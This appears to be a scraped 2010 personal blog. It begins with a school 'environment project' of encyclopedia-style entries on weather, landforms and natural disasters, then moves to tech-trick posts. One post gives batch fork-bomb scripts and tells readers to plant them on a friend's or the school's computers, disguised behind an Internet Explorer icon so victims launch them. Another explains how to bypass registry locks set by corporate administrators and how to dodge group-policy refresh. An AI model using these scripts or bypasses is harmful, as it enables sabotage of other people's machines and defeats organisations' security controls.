Thursday, March 18, 2010

Project for Envoirnment

1) Sunlight
In the broad sense, is the total frequency spectrum of electromagnetic radiation given off by the Sun. On Earth, sunlight is filtered through the Earth's atmosphere, and solar radiation is obvious as daylight when the Sun is above the horizon.


When the direct solar radiation is not blocked by clouds, it is experienced as sunshine, a combination of bright light and radiant heat. The World Meteorological Organization uses the term "sunshine duration" to mean the cumulative time during which an area receives direct irradiance from the Sun of at least 120 watts per square meter.[1]

Sunlight may be recorded using a sunshine recorder, pyranometer or pyrheliometer. Sunlight takes about 8.3 minutes to reach the Earth.

Direct sunlight has a luminous efficacy of about 93 lumens per watt of radiant flux, which includes infrared, visible, and ultraviolet light. Bright sunlight provides illuminance of approximately 100,000 lux or lumens per square meter at the Earth's surface.

2)Wind
Is the flow of gases on a large scale. On Earth, wind consists of the bulk movement of air. In outer space, solar wind is the movement of gases or charged particles from the sun through space, while planetary wind is the outgassing of light chemical elements from a planet's atmosphere into space. Winds are commonly classified by their spatial scale, their speed, the types of forces that cause them, the regions in which they occur, and their effect. The strongest observed winds on a planet in our solar system occur on Neptune and Saturn.

In meteorology, winds are often referred to according to their strength, and the direction the wind is blowing from. Short bursts of high speed wind are termed gusts. Strong winds of intermediate duration (around one minute) are termed squalls. Long-duration winds have various names associated with their average strength, such as breeze, gale, storm, hurricane, and typhoon. Wind occurs on a range of scales, from thunderstorm flows lasting tens of minutes, to local breezes generated by heating of land surfaces and lasting a few hours, to global winds resulting from the difference in absorption of solar energy between the climate zones on Earth. The two main causes of large scale atmospheric circulation are the differential heating between the equator and the poles, and the rotation of the planet (Coriolis effect). Within the tropics, thermal low circulations over terrain and high plateaus can drive monsoon circulations. In coastal areas the sea breeze/land breeze cycle can define local winds; in areas that have variable terrain, mountain and valley breezes can dominate local winds.

3) Rain
is liquid precipitation, as opposed to other kinds of precipitation such as snow, hail and sleet. Rain requires the presence of a thick layer of the atmosphere to have temperatures above the melting point of water near and above the Earth's surface. On Earth, it is the condensation of atmospheric water vapor into drops of water heavy enough to fall, often making it to the surface. Two processes, possibly acting together, can lead to air becoming saturated leading to rainfall: cooling the air or adding water vapour to the air. Virga is precipitation that begins falling to the earth but evaporates before reaching the surface; it is one of the ways air can become saturated. Precipitation forms via collision with other rain drops or ice crystals within a cloud. Rain drops range in size from oblate, pancake-like shapes for larger drops, to small spheres for smaller drops.




Moisture moving along three-dimensional zones of temperature and moisture contrasts known as weather fronts is the major method of rain production. If enough moisture and upward motion is present, precipitation falls from convective clouds (those with strong upward vertical motion) such as cumulonimbus (thunderstorms) which can organize into narrow rainbands. In mountainous areas, heavy precipitation is possible where upslope flow is maximized within windward sides of the terrain at elevation which forces moist air to condense and fall out as rainfall along the sides of mountains. On the leeward side of mountains, desert climates can exist due to the dry air caused by downslope flow which causes heating and drying of the air mass. The movement of the monsoon trough, or intertropical convergence zone, brings rainy seasons to savannah climes. Rain is the primary source of fresh water for most areas of the world, providing suitable conditions for diverse ecosystems, as well as water for hydroelectric power plants and crop irrigation. Rainfall is measured through the use of rain gauges. Rainfall amounts are estimated actively by weather radar and passively by weather satellites.

4) Soil
 is a natural body consisting of layers (soil horizons) of mineral constituents of variable thicknesses, which differ from the parent materials in their morphological, physical, chemical, and mineralogical characteristics

It is composed of particles of broken rock that have been altered by chemical and environmental processes that include weathering and erosion. Soil differs from its parent rock due to interactions between the lithosphere, hydrosphere, atmosphere, and the biosphere.[2] [3].

It supports a complex ecosystem, which supports the plants on the surface and creates new soil by breaking down rocks and sand.[4]. This microscopic ecosystem has co-evolved with the plants to collect and store water and nutrients in a form usable by plants. [5]

Soil particles pack loosely, forming a soil structure filled with pore spaces. These pores contain soil solution (liquid) and air (gas).[6] Accordingly, soils are often treated as a three state-system.[7] Most soils have a density between 1 and 2 g/cm³. [8] Soil is also known as earth: it is the substance from which our planet takes its name. Little of the soil composition of planet Earth is older than the Tertiary and most no older than the Pleistocene.[9] In engineering, soil is referred to as regolith, or loose rock material.


5) A mountain
is a large landform that stretches above the surrounding land in a limited area usually in the form of a peak. A mountain is generally steeper than a hill. The adjective montane is used to describe mountainous areas and things associated with them. The study of mountains is Orography.


Exogeology deals with planetary mountains, which in that branch of science are usually called montes (singular - mons). The highest mountain on earth is the Mount Everest (elevation 8,848 m). The highest known mountain in the Solar System is Olympus Mons on the planet Mars at 21,171 m (69,459 ft).

6) A glacier
 is a perennial mass of ice which moves over land. A glacier forms in locations where the mass accumulation of snow and ice exceeds ablation over many years. The word glacier comes from French via the Vulgar Latin glacia, and ultimately from Latin glacies meaning ice.[1] The corresponding area of study is called glaciology.


Glacier ice is the largest reservoir of fresh water on Earth, and is second only to oceans as the largest reservoir of total water. Glaciers cover vast areas of the polar regions and are found in mountain ranges of every continent including Australasia (there are glaciers in New Zealand). In the tropics glaciers are restricted to the highest mountains. The processes and landforms caused by glaciers and related to them are referred to as glacial. The process of glacier growth and establishment is called glaciation. Glaciers are indicators of climate and are important to world water resources and sea level variation. They are an important component of the more encompassing cryosphere.

1 Types of glaciers

2 Formation

3 Anatomy

4 Motion

4.1 Fracture zone and cracks

4.2 Speed

4.3 Ogives

5 Geography

6 Glacial geology

6.1 Moraines

6.2 Drumlins

6.3 Glacial valleys

6.4 Arêtes and horns (pyramid peak)

6.5 Roche moutonnée

6.6 Alluvial stratification

6.7 Deposits in contact with ice

6.8 Loess deposits

7 Transportation and erosion

8 Deposition

9 Isostatic rebound

10 Glaciers on Mars

11 See also

12 Cited references

13 Uncited references

14 External links

7) A forest
(also called a wood, woodland, wold, weald or holt) is an area with a high density of trees. There are many definitions of a forest, based on the various criteria.[1] These plant communities cover approximately 9.4% of the Earth's surface (or 30% of total land area), though they once covered much more (about 50% of total land area), in many different regions and function as habitats for organisms, hydrologic flow modulators, and soil conservers, constituting one of the most important aspects of the Earth's biosphere. Although a forest is classified primarily by trees a forest ecosystem is defined intrinsically with additional species such as fungi.[2] A woodland, with more open space between trees, is ecologically distinct from a forest.
8) Waterfall

A waterfall is a place where flowing water rapidly drops in elevation as it flows over a steep region or a cliff.
Type of waterfalls

Block: Water descends from a relatively wide stream or river.


Cascade: Water descends a series of rock steps.

Cataract: A large, powerful waterfall.

Fan: Water spreads horizontally as it descends while remaining in contact with bedrock.

Horsetail: Descending water maintains some contact with bedrock.

Plunge: Water descends vertically, losing contact with the bedrock surface.

Frozen waterfall in southeast New YorkPunchbowl: Water descends in a constricted form and then spreads out in a wider pool.

Segmented: Distinctly separate flows of water form as it descends.

Tiered: Water drops in a series of distinct steps or falls.

Multi-step: A series of waterfalls one after another of roughly the same size each with its own sunken plunge pool.
 
9) Lake
A lake (from Latin lacus) is a terrain feature (or physical feature), a body of liquid on the surface of a world that is localized to the bottom of basin (another type of landform or terrain feature; that is, it is not global) and moves slowly if it moves at all. Another definition is, a body of fresh or salt water of considerable size that is surrounded by land. On Earth a body of water is considered a lake when it is inland, not part of the ocean, is larger and deeper than a pond, and is fed by a river.[2][3] The only world other than Earth known to harbor lakes is Titan, Saturn's largest moon, which has lakes of ethane, most likely mixed with methane. It is not known if Titan's lakes are fed by rivers; Titan's surface is carved by numerous river beds.


Natural lakes on Earth are generally found in mountainous areas, rift zones, and areas with ongoing or recent glaciation. Other lakes are found in endorheic basins or along the courses of mature rivers. In some parts of the world there are many lakes because of chaotic drainage patterns left over from the last Ice Age. All lakes are temporary over geologic time scales, as they will slowly fill in with sediments or spill out of the basin containing them.

10 ) River
 A river is a natural watercourse,[1] usually freshwater, flowing toward an ocean, a lake, a sea or another river. In a few cases, a river simply flows into the ground or dries up completely before reaching another body of water. Small rivers may also be called by several other names, including stream, creek, brook, rivulet, and rill; there is no general rule that defines what can be called a river. An exception to this is the stream. In some countries or communities a stream may be defined by its size. Many names for small rivers are specific to geographic location; one example is Burn in Scotland and North-east England. Sometimes a river is said to be larger than a creek,[2] but this is not always the case, because of vagueness in the language.[3]


A river is part of the hydrological cycle. Water within a river is generally collected from precipitation through surface runoff, groundwater recharge, springs, and the release of stored water in natural ice and snowpacks (e.g., from glaciers).

11 ) Beach
A beach is a geological landform along the shoreline of a body of water. It usually consists of loose particles which are often composed of rock, such as sand, gravel, shingle, pebbles, or cobblestones. The particles of which the beach is composed can sometimes instead have biological origins, such as shell fragments or coralline algae fragments.


Wild beaches are beaches which do not have lifeguards or trappings of modernity nearby, such as resorts and hotels. They are sometimes called undeclared, undeveloped, undefined, or undiscovered beaches. Wild beaches can be valued for their untouched beauty and preserved nature. They are found in less developed areas such as Puerto Rico, Thailand or Indonesia.

12 ) Ocean
Approximately 71% of the Earth's surface (~3.61 X 1014 m2) is covered by ocean, a continuous body of water that is customarily divided into several principal oceans and smaller seas.


Though generally described as several 'separate' oceans, these waters comprise one global, interconnected body of salt water often referred to as the World Ocean or global ocean.[2][3] This concept of a continuous body of water with relatively free interchange among its parts is of fundamental importance to oceanography.


The major oceanic divisions are defined in part by the continents, various archipelagos, and other criteria. These divisions are (in descending order of size):

Pacific Ocean, which separates Asia and Australia from the Americas

Atlantic Ocean, which separates the Americas from Eurasia and Africa

Indian Ocean, which washes upon southern Asia and separates Africa and Australia

Southern Ocean, which, unlike other oceans, has no landmass separating it from other oceans and is therefore sometimes subsumed as the southern portions of the Pacific, Atlantic, and Indian Oceans, which encircles Antarctica and covers much of the Antarctic

Arctic Ocean, sometimes considered a sea of the Atlantic, which covers much of the Arctic and washes upon northern North America and Eurasia

13) Earth Quake
An earthquake (also known as a quake, tremor, or temblor) is the result of a sudden release of energy in the Earth's crust that creates seismic waves. Earthquakes are recorded with a seismometer, also known as a seismograph. The moment magnitude (or the related and mostly obsolete Richter magnitude) of an earthquake is conventionally reported, with magnitude 3 or lower earthquakes being mostly imperceptible and magnitude 7 causing serious damage over large areas. Intensity of shaking is measured on the modified Mercalli scale.


At the Earth's surface, earthquakes manifest themselves by shaking and sometimes displacing the ground. When a large earthquake epicenter is located offshore, the seabed sometimes suffers sufficient displacement to cause a tsunami. The shaking in earthquakes can also trigger landslides and occasionally volcanic activity.

In its most generic sense, the word earthquake is used to describe any seismic event — whether a natural phenomenon or an event caused by humans — that generates seismic waves. Earthquakes are caused mostly by rupture of geological faults, but also by volcanic activity, landslides, mine blasts, and nuclear experiments. An earthquake's point of initial rupture is called its focus or hypocenter. The term epicenter refers to the point at ground level directly above the hypocenter.

14) Tsunami
tsunami (津波?) (English pronunciation: /(t)suːˈnɑːmi/) is a series of water waves (called a tsunami wave train[1]) caused by the displacement of a large volume of a body of water, such as an ocean. The original Japanese term literally translates as "harbor wave." Tsunamis are a frequent occurrence in Japan; approximately 195 events have been recorded.[2] Due to the immense volumes of water and energy involved, tsunamis can devastate coastal regions. Casualties can be high because the waves move faster than humans can run.


Earthquakes, volcanic eruptions and other underwater explosions (detonations of nuclear devices at sea), landslides and other mass movements, bolide impacts, and other disturbances above or below water all have the potential to generate a tsunami.
The Greek historian Thucydides was the first to relate tsunami to submarine earthquakes,[3][4] but understanding of tsunami's nature remained slim until the 20th century and is the subject of ongoing research. Many early geological, geographical, and oceanographic texts refer to tsunamis as "seismic sea waves."

Some meteorological conditions, such as deep depressions that cause tropical cyclones, can generate a storm surge, called a meteotsunami, which can raise tides several metres above normal levels. The displacement comes from low atmospheric pressure within the centre of the depression. As these storm surges reach shore, they may resemble (though are not) tsunamis, inundating vast areas of land. Such a storm surge inundated Burma (Myanmar) in May 2008.

15) Volcano
A volcano is an opening, or rupture, in a planet's surface or crust, which allows hot magma, ash and gases to escape from below the surface. The word volcano is derived from the name of Vulcano island off Sicily which in turn, was named after Vulcan, the Roman god of fire.[1]


Volcanoes are generally found where tectonic plates are diverging or converging. A mid-oceanic ridge, for example the Mid-Atlantic Ridge, has examples of volcanoes caused by divergent tectonic plates pulling apart; the Pacific Ring of Fire has examples of volcanoes caused by convergent tectonic plates coming together. By contrast, volcanoes are usually not created where two tectonic plates slide past one another. Volcanoes can also form where there is stretching and thinning of the Earth's crust (called "non-hotspot intraplate volcanism"), such as in the African Rift Valley, the Wells Gray-Clearwater volcanic field and the Rio Grande Rift in North America and the European Rhine Graben with its Eifel volcanoes.

Volcanoes can be caused by mantle plumes. These so-called hotspots, for example at Hawaii, can occur far from plate boundaries. Hotspot volcanoes are also found elsewhere in the solar system, especially on rocky planets and moons.

16) Tornado
A tornado is a violent, dangerous, rotating column of air which is in contact with both the surface of the earth and a cumulonimbus cloud or, in rare cases, the base of a cumulus cloud. The most intense of all atmospheric phenomena, tornadoes come in many shapes and sizes but are typically in the form of a visible condensation funnel, whose narrow end touches the earth and is often encircled by a cloud of debris and dust. Most tornadoes have wind speeds between 40 mph (64 km/h) and 110 mph (177 km/h), are approximately 250 feet (75 m) across, and travel a few miles (several kilometers) before dissipating. The most extreme can attain wind speeds of more than 300 mph (480 km/h), stretch more than a mile (1.6 km) across, and stay on the ground for dozens of miles (more than 100 km).[1][2][3]


Various types of tornadoes include the landspout, multiple vortex tornado, and waterspout. Waterspouts have similar characteristics to tornadoes, characterized by a spiraling funnel-shaped wind current that form over bodies of water, connecting to large cumulus and thunderstorm clouds. Waterspouts are generally classified as non-supercellular tornadoes that develop over bodies of water.[4] These spiraling columns of air frequently develop in tropical areas close to the equator, and are less common at high latitudes.[5] Other tornado-like phenomena which exist in nature include the gustnado, dust devil, fire whirls, and steam devil.

17) Forest Fire
A wildfire is any uncontrolled fire that occurs in the countryside or a wilderness area.[1][2] Other names such as brush fire, bushfire, forest fire, grass fire, hill fire, peat fire, vegetation fire, and wildland fire may be used to describe the same phenomenon depending on the type of vegetation being burned. A wildfire differs from other fires by its extensive size, the speed at which it can spread out from its original source, and its ability to change direction unexpectedly and to jump gaps, such as roads, rivers and fire breaks.[3] Wildfires are characterized in terms of the cause of ignition, their physical properties such as speed of propagation, the combustible material present, and the effect of weather on the fire.


Wildfires occur on every continent except Antarctica. Fossil records and human history contain accounts of wildfires, as wildfires can occur in periodic intervals.[5][6] Wildfires can cause extensive damage, both to property and human life, but they also have various beneficial effects on wilderness areas. Some plant species depend on the effects of fire for growth and reproduction,[5] although large wildfires may also have negative ecological effects.[4]

Strategies of wildfire prevention, detection, and suppression have varied over the years, and international wildfire management experts encourage further development of technology and research.[7] One of the more controversial techniques is controlled burning: permitting or even igniting smaller fires to minimize the amount of flammable material available for a potential wildfire.[8][9] While some wildfires burn in remote forested regions, they can cause extensive destruction of homes and other property located in the wildland-urban interface: a zone of transition between developed areas and undeveloped wilderness

18) Famine
A famine is a widespread scarcity of food that may apply to any faunal species. This phenomenon is usually accompanied by regional malnutrition, starvation, epidemic, and increased mortality.


Emergency measures in relieving famine primarily include providing deficient micronutrients, such as vitamins and minerals, through fortified sachet powders or directly through supplements.[1][2] The famine relief model increasingly used by aid groups calls for giving cash or cash vouchers to the hungry to pay local farmers instead of buying food from donor countries, often required by law, as it wastes money on transport costs.
Long term measures include investmenting in modern agriculture in places that lack them, such as fertilizers and irrigation, which largely eradicated hunger in the developed world.[5] However, World Bank strictures restrict government subsidies for farmers and the spread of fertilizer use is hampered by some environmental groups.

19) Flood
A flood is an overflow or accumulation of an expanse of water that submerges land.[1] In the sense of "flowing water", the word may also be applied to the inflow of the tide. Flooding may result from the volume of water within a body of water, such as a river or lake, which overflows or breaks levees, with the result that some of the water escapes its usual boundaries.[2] While the size of a lake or other body of water will vary with seasonal changes in precipitation and snow melt, it is not a significant flood unless such escapes of water endanger land areas used by man like a village, city or other inhabited area.


Floods can also occur in rivers, when the strength of the river is so high it flows out of the river channel, particularly at bends or meanders and causes damage to homes and businesses along such rivers. While flood damage can be virtually eliminated by moving away from rivers and other bodies of water, since time out of mind, people have lived and worked by the water to seek sustenance and capitalize on the gains of cheap and easy travel and commerce by being near water. That humans continue to inhabit areas threatened by flood damage is evidence that the perceived value of living near the water exceeds the cost of repeated periodic flooding.

20) Hurricane
A tropical cyclone is a storm system characterized by a large low-pressure center and numerous thunderstorms that produce strong winds and heavy rain. Tropical cyclones feed on heat released when moist air rises, resulting in condensation of water vapor contained in the moist air. They are fueled by a different heat mechanism than other cyclonic windstorms such as nor'easters, European windstorms, and polar lows, leading to their classification as "warm core" storm systems. Tropical cyclones originate in the doldrums near the equator, about 10° away from it.


The term "tropical" refers to both the geographic origin of these systems, which form almost exclusively in tropical regions of the globe, and their formation in maritime tropical air masses. The term "cyclone" refers to such storms' cyclonic nature, with counterclockwise rotation in the Northern Hemisphere and clockwise rotation in the Southern Hemisphere. Depending on its location and strength, a tropical cyclone is referred to by names such as hurricane, typhoon, tropical storm, cyclonic storm, tropical depression, and simply cyclone.

While tropical cyclones can produce extremely powerful winds and torrential rain, they are also able to produce high waves and damaging storm surge as well as spawning tornadoes. They develop over large bodies of warm water, and lose their strength if they move over land. This is why coastal regions can receive significant damage from a tropical cyclone, while inland regions are relatively safe from receiving strong winds. Heavy rains, however, can produce significant flooding inland, and storm surges can produce extensive coastal flooding up to 40 kilometres (25 mi) from the coastline. Although their effects on human populations can be devastating, tropical cyclones can also relieve drought conditions. They also carry heat and energy away from the tropics and transport it toward temperate latitudes, which makes them an important part of the global atmospheric circulation mechanism. As a result, tropical cyclones help to maintain equilibrium in the Earth's troposphere, and to maintain a relatively stable and warm temperature worldwide.

21) Snow Slide
An avalanche is a rapid flow of snow down a slope, from either natural triggers or human activity. Typically occurring in mountainous terrain, an avalanche can mix air and water with the descending snow. Powerful avalanches have the capability to entrain ice, rocks, trees, and other material on the slope; however avalanches are always initiated in snow, are primarily composed of flowing snow, and are distinct from mudslides, rock slides, rock avalanches, and serac collapses from an icefall. In mountainous terrain avalanches are among the most serious objective hazards to life and property, with their destructive capability resulting from their potential to carry an enormous mass of snow rapidly over large distances.


Avalanches are classified by their morphological characteristics, and are rated by either their destructive potential, or the mass of the downward flowing snow. Some of the morphological characteristics used to classify avalanches include the type of snow involved, the nature of the failure, the sliding surface, the propagation mechanism of the failure, the trigger of the avalanche, the slope angle, direction, and elevation. Avalanche size, mass, and destructive potential are rated on a logarithmic scale, typically made up of 4 to 7 categories, with the precise definition of the categories depending on the observation system or forecast region.

22) Lightning

Lightning is an atmospheric discharge of electricity accompanied by thunder, which typically occurs during thunderstorms, and sometimes during volcanic eruptions or dust storms.[1] In the atmospheric electrical discharge, a leader of a bolt of lightning can travel at speeds of 60,000 m/s (130,000 mph), and can reach temperatures approaching 30,000 °C (54,000 °F), hot enough to fuse silica sand into glass channels known as fulgurites which are normally hollow and can extend some distance into the ground.[2][3] There are some 16 million lightning storms in the world every year.[4]


Lightning can also occur within the ash clouds from volcanic eruptions, or can be caused by violent forest fires which generate sufficient dust to create a static charge.[1][5]

How lightning initially forms is still a matter of debate:[6] Scientists have studied root causes ranging from atmospheric perturbations (wind, humidity, friction, and atmospheric pressure) to the impact of solar wind and accumulation of charged solar particles.[4] Ice inside a cloud is thought to be a key element in lightning development, and may cause a forcible separation of positive and negative charges within the cloud, thus assisting in the formation of lightning.[4

23) Land Slide
A landslide or landslip is a geological phenomenon which includes a wide range of ground movement, such as rock falls, deep failure of slopes and shallow debris flows, which can occur in offshore, coastal and onshore environments. Although the action of gravity is the primary driving force for a landslide to occur, there are other contributing factors affecting the original slope stability. Typically, pre-conditional factors build up specific sub-surface conditions that make the area/slope prone to failure, whereas the actual landslide often requires a trigger before being released
Causes of landslides


The Mameyes Landslide, in barrio Tibes, Ponce, Puerto Rico, which buried more than 100 homes, was caused by extensive accumulation of rains and, according to some sources, lightning.Landslides occur when the stability of a slope changes from a stable to an unstable condition. A change in the stability of a slope can be caused by a number of factors, acting together or alone. Natural causes of landslides include:

groundwater (porewater) pressure acting to destabilize the slope

Loss or absence of vertical vegetative structure, soil nutrients, and soil structure (e.g. after a wildfire)

erosion of the toe of a slope by rivers or ocean waves

weakening of a slope through saturation by snowmelt, glaciers melting, or heavy rains

earthquakes adding loads to barely-stable slopes

earthquake-caused liquefaction destabilizing slopes

volcanic eruptions


24) Meteor
A meteoroid is a sand- to boulder-sized particle of debris in the Solar System. The visible path of a meteoroid that enters Earth's (or another body's) atmosphere is called a meteor, or colloquially a shooting star or falling star. If a meteor reaches the ground and survives impact, then it is called a meteorite. Many meteors appearing seconds or minutes apart are called a meteor shower. The root word meteor comes from the Greek meteōros, meaning "high in the air".
The current official definition of a meteoroid from the International Astronomical Union is "a solid object moving in interplanetary space, of a size considerably smaller than an asteroid and considerably larger than an atom."[1] The Royal Astronomical Society has proposed a new definition where a meteoroid is between 100 µm and 10 m across.[2] The NEO definition includes larger objects, up to 50 m in diameter, in this category. Very small meteoroids are known as micrometeoroids (see also interplanetary dust).


The composition of meteoroids can be determined as they pass through Earth's atmosphere from their trajectories and the light spectra of the resulting meteor. Their effects on radio signals also yield information, especially useful for daytime meteors which are otherwise very difficult to observe. From these trajectory measurements, meteoroids have been found to have many different orbits, some clustering in streams (see Meteor showers) often associated with a parent comet, others apparently sporadic. Debris from meteoroid streams may eventually be scattered into other orbits. The light spectra, combined with trajectory and light curve measurements, have yielded various compositions and densities, ranging from fragile snowball-like objects with density about a quarter that of ice,[3] to nickel-iron rich dense rocks.

Meteoroids travel around the sun in a variety of orbits and at various velocities. The fastest ones move at about 26 miles per second (42 kilometers per second) through space in the vicinity of Earth's orbit. The earth travels at about 18 miles per second (29 kilometers per second). Thus, when meteoroids meet the Earth's atmosphere head-on (which would only occur if the meteor were in a retrograde orbit), the combined speed may reach about 44 miles per second (71 kilometers per second).

25) Snow Storm

A winter storm is an event in which the dominant varieties of precipitation are forms that only occur at cold temperatures, such as snow or sleet, or a rainstorm where ground temperatures are cold enough to allow ice to form (i.e. freezing rain). In temperate continental climates, these storms are not necessarily restricted to the winter season, but may occur in the late autumn and early spring as well. Very rarely, they may form in summer, though it would have to be an abnormally cold summer, such as the summer of 1816 in the Northeast United States of America. In many locations in the Northern Hemisphere, the most powerful winter storms usually occur in March[citation needed] and, in regions where temperatures are cold enough, April.

Snowstorms are storms where large amounts of snow fall. Snow is less dense than liquid water, by a factor of approximately 10 at temperatures slightly below freezing, and even more at much colder temperatures.[citation needed] Therefore, an amount of water that would produce 0.8 in. (2 cm.) of rain could produce at least 8 in (20 cm) of snow. Two inches of snow (5 cm.) is enough to create serious disruptions to traffic and school transport (because of the difficulty to drive and maneuver the school buses on slick roads). This is particularly true in places where snowfall is uncommon but heavy accumulating snowfalls can happen (e.g., Atlanta, Seattle, London, Dublin, Canberra, Vancouver and Las Vegas). In places where snowfall is common, such as Utica, Detroit, Denver, Ottawa, Montreal, Quebec City, Chicago, Pittsburgh, Buffalo, NY, Toronto and Minneapolis, such small snowfalls are rarely disruptive, because winter tires are used, though snowfalls in excess of 6 in (15 cm) usually are.

Monday, March 15, 2010

Fix Registry editing has been disabled by your administrator error

If you’ve recently tried to open the Windows Registry and were presented with the message” “Registry editing has been disabled by your administrator”, then you’re not alone! You can get this message for several reasons and sometimes will not be able to run regedit unless you are an Administrator.
Most of the time you will see this in corporate environments where the IT staff has locked down the computer by disbaling Windows settings and services. If it’s a policy pushed out by the main servers, it’ll be pretty hard to bypass, however you can still try!
In order to re-enable access to edit the registry, you can try to edit the group policy settings and see if that works. If you know the local admin password for the computer, log in under that account. If not, you can still give it a shot.
Method 1
Step 1: Click on Start, choose Run and type in gpedit.msc.

Step 2: Navigate to User Configuration – Administrative Templates – System

Step 3: In the right hand pane, double click on “Prevent access to registry editing tools”

Step 4: If it is not configured, go ahead and enable it, click OK and then come back and disable it. If it’s already set to Enabled, then simply disable it.
Now try to run the registry editor and see if that works. If not, go to the command prompt (Start, Run, type cmd) and type in gpupdate. But if you are in a corporate environment, you may not want to do this as it will update back to the restrictive setting.
In that case, restart the computer, but unplug the network cord so that the computer does not refresh the group policy from the main server. You may also want to do the procedure above while disconnected from the network completely in order to ensure that the policy does not get overridden by the corporate policy.
If you have a home computer, then you don’t have to worry about all of this, just restart your computer and you should be able to edit your registry again.
Method 2
Another method you can use is to go to Start, then Run and paste the following line into the run box:
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

Now try to open the registry editor and see if it works. You may have to restart your computer for the effects to take place.
Note: Before making any changes to the registry, read my article on how to backup and restore the registry in case something goes wrong.
Method 3
If you don’t like to mess with the registry, you can download a VBScript that will enable the registry for you when you run it. The script is a little more advanced and will not harm your computer, it’s actually written by a Microsoft MVP!
You can download the script here and then just double click on it to run it. After that, try the registry should be enabled.
If none of the above methods work, you may have a virus or some other sort of malware installed on your computer. In some cases, there is a file called regedit.com that gets created and you have to either delete it or rename it to regedit.exe. Read this post on how to remove spyware and malware from your computer. Enjoy!

Wednesday, March 10, 2010

How to crash your computer

introHow to crash your computer
Very Simple . . .

image not found
i
InstructJS.load(['instruct','imagespot'], function () {var spotspot507930 = new ImageSpot( 'spot507930', { loadID: 'F676WD2FGZO0C7S', editimagedata: 'false', imageDataEditorPlace: '', showInfo: true, size: 'MEDIUM' } );
new ImageInfo( spotspot507930, {"imageID":"F676WD2FGZO0C7S","name":"crash.jpg","imageURL":"/files/deriv/F67/6WD2/FGZO0C7S/F676WD2FGZO0C7S.MEDIUM.jpg","showURL":"/file/F676WD2FGZO0C7S/","description":null,"length":208630,"width":1280,"height":1024} );
info = new ImageInfo( spotspot507930, {"imageID":"F676WD2FGZO0C7S","name":"crash.jpg","imageURL":"/files/deriv/F67/6WD2/FGZO0C7S/F676WD2FGZO0C7S.MEDIUM.jpg","showURL":"/file/F676WD2FGZO0C7S/","description":null,"length":208630,"width":1280,"height":1024} ).imageURL = '/image/F676WD2FGZO0C7S/How-to-crash-your-computer.jpg';
spotspot507930.register(info); InstructJS.cachedRefs.spotspot507930=spotspot507930;runAfterDomLoad(spotspot507930.eventWindowLoaded); });


// help bubbles
InstructJS.load(["helpbubble"], function () {
//Helper text and dummy fxn for non-logged-in users
function makeHelpBubbleFileText() {
return 'Membership Benefit!'
+ 'To download attached files, please '
+ ''
+ 'sign up
or login.'
+ makeHelpBubbleLoginHTML('?files#files')
+ '';
}
$("files").select("span").each( function( file ) {
//
if ( file && file.down("a") && file.down("a").down("img") ) {
new HelpBubble({
clickEl : file.down("a"),
width: 200,
popUp: true,
contents : makeHelpBubbleFileText(),
additionalActions: focusOnHelpBubbleLogin
});
}
//
});
});


GA_googleFillSlot("tech_inline_med_rectangle");


GA_googleFillSlot("rightside_inline_med_rectangle");

Remove these ads by Signing Up.
To View All Steps on one page, Go Pro Today!
step 1Just go to notepadJust go to notepad (startall programsaccessoriesnotepad) and type exactly this script btween the lines: ___________________________________________________________________@echo off:crashstartgoto crash___________________________________________________________________
step 2Save as .batgoto filesave ascrash.bat and save! But remember when you open this file command prompt windows will open until the computer crashes or freezes so it would be better if you placed this on a friend's or the school's computers.
step 3Different variationsThere are different scripts that you can write in notepad to get a batch file with similar reactions. such as: ________________@echo off:startstart %0goto start_________________or_________________@echo off:1start iexplore.exegoto 1_________________or_________________@echo off:foldermd *goto folder_________________or_________________@echo off:1startecho Windows is now cr…
step 4Disguise itWhen you place this file on someone else's computer you have to make the file look persuasive to click on desktop. So find the crash.bat file in documents or all files, right-click itsend todesktop(create shortcut). Now find it on your desktopright clickpropertieschange iconchange it to nternet explorer iconapplyexit. Right click it againrenamerename to: Internet Expl…
step 5Recovering from the crashTo recover your desktop (PC) from this just directly pull the plugs from your PC and put the plugs back in and start it up again or just hold the power button on your PC until it turns off and restart again. I'm not sure about how to recover from this with labtops.

Tuesday, March 09, 2010

How crash windows XP manually???

Windows-XP has a "feature" (???) with which it is possible to manually crash a system by simply holding the right CTRL key and pressing the "Scroll Lock" key twice. This feature can be turned on by the following steps:

1. Start regedit. (If you are unfamiliar with regedit, please refer to this FAQ)

2.Navigate to:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters

3. Create a new DWORD value and name it CrashOnCtrlScroll

4. Right-click on this newly created value and click on Modify

5. Enter 1 in the Value data field and click on OK.

6. Close regedit and reboot your system.

7. Now you can blue screen (crash) your system by holding the right CTRL key and pressing "Scroll Lock" twice.

Note:

Your system may reboot or show a blue screen whenever this crash is initiated. If your system reboots after initiating the crash, and you want to see the blue screen, follow these steps:

1. Go to Control Panel > System

2. Click on the Advanced tab

3. Under Startup and Recovery, click the Settings button.

4. Under System failure, uncheck the option Automatically restart.

Happy crashing...

Monday, March 08, 2010

Internet Tricks And hacks

Change Yahoo messenger title barHey guys you can change the yahoo messenger title bar... For this just find the folder messenger in the drive in which the messenger is installed. Then search a file named "ymsgr". In this file just go to the end and write the following code:[APP TITLE]CAPTION=Red DevilHere you can write any name in place of Red Devil... then see the fun.... You can have your own name being placed in yahoo messenger title bar.
2) Enable Right Clicks on The Sites Dat Disable itLots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window. It's easy to change, assuming your using IE 6: Click "Tools"->"Internet Options" Click the "Security" tab Click "Custom Level" Scroll down to the "Scripting" section Set "Active Scripting" to "disable" Click "Ok" a couple of times. You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website

download hacking stuff

Ultimate Hacking Experience 2008 Collection:-
